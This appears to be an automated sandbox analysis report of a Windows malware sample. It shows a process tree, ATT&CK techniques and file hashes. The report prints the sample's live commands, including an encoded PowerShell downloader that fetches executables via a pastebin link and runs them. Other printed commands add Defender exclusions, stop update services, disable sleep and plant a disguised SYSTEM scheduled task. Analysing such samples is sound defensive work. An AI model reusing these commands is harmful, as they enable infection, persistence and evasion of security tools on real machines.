  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBoAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB4AGkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxAGwAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHoAYQBDAGcAcgBSADAAMgAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHEAZgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQB5AGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAZQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAagBjAHUAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:3792
- - C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y0.exe
    "C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y0.exe"
    3⤵
    PID:3628
- - C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y1.exe
    "C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y1.exe"
    3⤵
    PID:5048
- - C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y2.exe
    "C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4692
- - C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y3.exe
    "C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y3.exe"
    3⤵
    - Executes dropped EXE
    PID:4160

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4008

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2756
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3864
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5028
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:1616
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4076
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3848

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:1444

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:3200

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:1584

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4488
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5060
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4900
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4056
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:3936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:1644

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:1640

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:2416

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3044
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1396
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:2576
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4028

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:224

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1724

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4464

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 632 -s 800
1⤵
- Program crash
PID:2388

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 688 -ip 688
1⤵
PID:3424

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 632 -ip 632
1⤵
PID:4920

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:3848

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 688 -s 4640
1⤵
- Program crash
PID:3244

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"
1⤵
PID:3956

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"
1⤵
PID:5060

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 380 -ip 380
1⤵
PID:3836

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 188 -p 3616 -ip 3616
1⤵
PID:1384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3616 -s 976
1⤵
- Program crash
PID:4948

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 4956 -ip 4956
1⤵
PID:4608

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2160

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4956 -s 356
1⤵
- Program crash
PID:2388

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2492

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3760

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2680

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4112

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000188 00000084
1⤵
- Executes dropped EXE
PID:4840

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000190 00000084
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5048

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000a4 00000084
1⤵
- Executes dropped EXE
PID:3628

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000104 00000084
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:856

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000080 00000084
1⤵
PID:3252

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000fc 00000084
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updatestarter.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

Filesize
39KB

MD5
74368ec8b67c68703ea2666435050c84

SHA1
d33f29626f1923635bc1735cbd0212bcffea75c7

SHA256
d311a6c56d00b54e99125f07fc7ecc3b1de40d60271991736eb3398f257eb83d

SHA512
4b3d1ff745f6bc517f15800fad1dc3c285c6a545b9ac16b9fcff069f3ddcbe5a23e0e3a966e9194a3f9d38a35523df29ed6424ff9c243f65b1f90b9705c696e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

Filesize
32KB

MD5
c967968a175db49d0658db25241a8dbd

SHA1
2cc09dc7d0fa17063a119f84c6b91e8031349a31

SHA256
c662a6b643cb43c5abc464afa5cc9f9484fc77535a0d4ca6c390c04d6dfde083

SHA512
dabbc31c2b9ab4aab7d24a93c4801b6a4fd5763bda43ca64d69549ec1a27f43a6fe38e4f9ea5a506868a3984d4a95eac170480c9928b8f062b2a3d8c6253c7cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020

Filesize
42KB

MD5
3cf44eff2da9427f46f679875d873147

SHA1
ab8168e58fdd8db4749cb8c6f6a699c53af1925f

SHA256
abd4b89f9916cb0673d9977dcad128b4456bae2b6036881df996ff0d40442fe3

SHA512
03ab548b17892dd2a979bc3425904534ca97d209a67e6eeb4e1455995a60c10d99e09a3621836e9ccf3d512e34d02f2ae7654210e388bb7b7545c72eca87fa81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

Filesize
17KB

MD5
b16fe16341cfc5d5706c5c32c74288d4

SHA1
ede08fafca0c938aac4e857f9d6695e77e50533f

SHA256
9a945fa143b6bba59643b0392b518c7b6f8588df824ea17aef80ec1051fff8ab

SHA512
7d61330b8981c39fdd68112bf1086b93fe5e196bc9b8e346aa30d27caaaa8aadd81838b8289c57ba64ccc68c99586d91d64c85ecdd57dc30f8585348c417e279

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
de8f2c500d133a5be680ba4cd46db857

SHA1
764e30f6a6ac8101a1eaee9c596dc3e312cdf05f

SHA256
36b3afba740c600c59722c128c39281c77b185273c3c06d39d02a72994ce94e0

SHA512
9d41528a4f60009e5f40af09066bcda2d41ed05a3142eca86b9ee90b518b67b6a6d1dfd602e4bbeccca5a39edea8715c21bc9533219b837f52ffaa410b9e00c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
a1e31ee9800f1c30a8085ec7c9dccd88

SHA1
b4b3ca1b8c0e717476c9662492cb21ab2788729f

SHA256
4d659a2d59c5bdcbc6306203fd5caf9a812396e792b07f718941985f7cb595bf

SHA512
0696b039163a03b93f84bdbf02d2e67692720d6e40e499e67df29f73e327a5c2726e04a3b131f4dbcc9d954c6d7715269c4c1a8afeb125e5c3bcf03ef7de4bff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
6b3cd80b4b65b9037d5c11abecaacc32

SHA1
d0c710eee71a8569de9a8576cb3a559bd4947251

SHA256
6845b05cf6e2c0a0a81c49bc41bef84e51d3a0946884fdcbbe839ce28f6f3e6b

SHA512
35a400cc3cbdcf0b1b7a3b74698459f3e645b9e64644a81a492d81848e13a0017cbce0571f4e44b8ffd6110ddf65edebbb97fbef74d15dfc93a0f2b06b4add21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
04d06463efd803e8850c6b0f3d7d5f17

SHA1
88478f067ae7cfff1c5cadbb2fe17df2865dd066

SHA256
46ce33d50adca3f3da3fd3ebc25792d5158b3c09bf7c97377fad3efd42fb11ef

SHA512
67fb332170f78221be8ca43cde6b12b84e1781f24e1950a60e1787152951782be4b919a0b2aee17f889c6521be95c6f6250fd6c15abb8189c8bf0d46ad9d27f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
d742f39d436bb1ebcc1ddcde88d65a86

SHA1
d26e3ca70dc315174d640a7cda5d5684441a8200

SHA256
1a704a71272a82ebcb5ecd1a91fb9dad1848f13ea6c30978b13b7a90d27ad500

SHA512
44dc3a63171ffeba9fcbecb9de2579062c90c9cdfbee7c52104cf2ca676c4204630f029353a4295299e192bd58fb49e03ba163cb8d02da7d8b9279bdbd856a1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
5861f1c26138aa3d66353ca430436d06

SHA1
c7bc6243cbdd91afd640c432a821c3a2f8cc37f2

SHA256
e451973370b4b669caec2884197518b7f8566c11060cf4ade343420db2017454

SHA512
d0ad387125cc37d2afaa733315192391d5dbfd43390d8a094d7f660640c3f97e93cb33800b4d830a7683792844b15ce2d4d0dedbcfd0246d6c8f6915dac83b08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
5b5281fb34eefddf34957a4ce7f605f3

SHA1
0887d97d84eeaaed1be6720ea12bebf0284d3de9

SHA256
aa396ac787ff8d597006c0f4f70ebde8e903217ccea80b2ac97be249b44fcd08

SHA512
db391cd9bd768931d74533c8a5884e0c40d81c054e360973612ae062662d0697f1cca41651c2855e13e581d4871d50e61f8d19c9fde49342e1269be1e7e8f7bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
bbb10c6a8d1dc03ce5fd594d80b52fc7

SHA1
9ec1820804312ccce008f2000025c0dd002a29ab

SHA256
fcdeba8f913edfc2085d79cb79601e201732b4a30b9e8e09340a713582311961

SHA512
9efbc5de81c43504303510849eb85c3709b4dfc9a38528a66c5a59d788a2dde73f9f25e3c704da6524479595f8e96e736bf6d6fa49c8bb8997a41d39cf93e42d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
99dd70ede986183ae166b8e7637028ad

SHA1
385585e4090edbaba8761e71d073fda031bb79a3

SHA256
26700d6120834042d374f12a1af2f8abae12997f0d84230bd0c3b44a14671e16

SHA512
596f1b4855a07655b44e2b87260ca3ff67c8090877734f910cac7f6294c6ad57a78aa04ccae6657f1812f8242de025504aaa8002087a74a2ab946f384f428b5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
c2e08e21ab636d4917837b4a763e2c8e

SHA1
796d4c0257ed3528ab550a61bb990ce3464fe862

SHA256
608a4754e9889611a2119e4e78d1acb70bb20c7919798a1871d90cab275c0878

SHA512
2084083296da3dbbf32049b79e08b9babf8c2f118786a1c184301ebdafab90ba885f8fe609479063404df544adb57377f781ba963d4f08262bf300d1c176c9ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
af1115c76ba53430e287b92571f5f9fa

SHA1
bd9b256a8e384628de3f3abadfa14825dafcfb9f

SHA256
1b2bb6c1126685be1823adc2fb5c3426fd58e9e2175d17644f340b84fc84379a

SHA512
c3c9205b95350acb48c94614015d623bd52f2e22a903c830eab8826fe8dbe959e415c14d8fde0df8db5ede02032871542b37a7cbde70abaac5e868ddda43ac8b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
c8eb0ef1b20ad37154a2ac6e9733f0a0

SHA1
63e78ecdf3e7345e9f4707da30551488f0d0a728

SHA256
310039ca2fe3c8d6dd2c407b621224bd047f570edcd2c940768cb12cba9ff85e

SHA512
8ae8e022cbc8a1f7c6d4feb1c8c2854387859f4fed6584b7bd853092356b4a44464f5e168d9a8a3b869fc324696af87c23347ec2850c4c74f6cda53b4fe0c32c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
199ed356e05a6e06b3a14b9f22378785

SHA1
fe576f29a6b09ab55781955ef769eb6266e78af6

SHA256
aded8973f230fd11822e92cf443fe88dd1798d8bd6bced8d6a699b4258752421

SHA512
afc5b2889fe6e897f6672b09fc12cfea5eb9a5a84846412994762b64bb2acf75ae506e8c965b73fb6885420367546a43714296b062585486a07be6fcad07f05a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
f96d0bf1d18c07907960a250869bad06

SHA1
d1eb2b2bf64345a4bef797f039a061e2f422a07a

SHA256
454f2ae6fdfee98e83ad18bf81e976b54b98b512f7f07bee570ee3a7fa50006a

SHA512
11998920ad066b3da66102e40ce397dcf3984fc764efea4273fd6bcbdc9d2f79c6360426bc8329ccee43afbedfa83a08c06b47a9b6569599854172fd1b5fcf40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
87ee02f1c252a53caa0bedd3914cbc2d

SHA1
3a3bb3651be3b315a72dfb13d550bfd9dcec8832

SHA256
15eb505cca924cf7dfa3d732786cca70c833c5813afc63ff581d45fe4e80d71c

SHA512
c5675fcdc472413edd06953b120fbaebd5f5824e3d984e53472d1cb8af38f9f57849beb63fe9e9acbccac1db68bd0072ff0efc8fe0f9d2399a6175dbf07b553e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
08f247c576730bb64eefd897a3cfe4f2

SHA1
eb98c1e3b3f8bf0c05f23f880bf6cf66a6126e7a

SHA256
58b11e475a4d70a89a21a5eea7592683401d1176f5f64d9737930f9e8de50177

SHA512
864e908080129ecc0b7a79a0aa18461b320daf5e871ccc64be6d9d3e99b81c69a76ab1be5d6c0dbd29317f891c0c8c3ac47d0347f7f9c864e6e7e507e554a7cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
9875d95150b069ea193cf157f906940d

SHA1
805f6d8f1abe7f0c8366190625e906da58b0d765

SHA256
241a73180f654020b805eed4b87d9c6fe1cc30f198b17fd2728d14895f9badf3

SHA512
7cc80678434afd500d6c730525e7e260c77ca8309bb8529bbabc5b6b2db66d706e2e9ab2d9bc2d713347598f0ad0099d6b7dcfc2bfc7314660dba895f8d536ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
868ef391ccdce0bb01a4b64b60ad5dbc

SHA1
875b5bb277f1f21475586ccb533172a9f4c07f2d

SHA256
9113a3c773bd7b47c94f1c7f062e858606ad38037cb879e486742bfb983d6f11

SHA512
ea31447ca9f47e7e43615d1a639eaf595065fd978339c70baa2526a38c152c3babad2eb518a4d282a64458aa0fb0150c4b3b7db4241aff4f3fa9b8665fa3809f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
868ef391ccdce0bb01a4b64b60ad5dbc

SHA1
875b5bb277f1f21475586ccb533172a9f4c07f2d

SHA256
9113a3c773bd7b47c94f1c7f062e858606ad38037cb879e486742bfb983d6f11

SHA512
ea31447ca9f47e7e43615d1a639eaf595065fd978339c70baa2526a38c152c3babad2eb518a4d282a64458aa0fb0150c4b3b7db4241aff4f3fa9b8665fa3809f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm0.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm0.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm1.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm1.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm2.exe

Filesize
444KB

MD5
32b9404c781c7e14e32755a98d93b608

SHA1
40803b89f251543a6647feced5f326e00985aa29

SHA256
87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97

SHA512
79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm2.exe

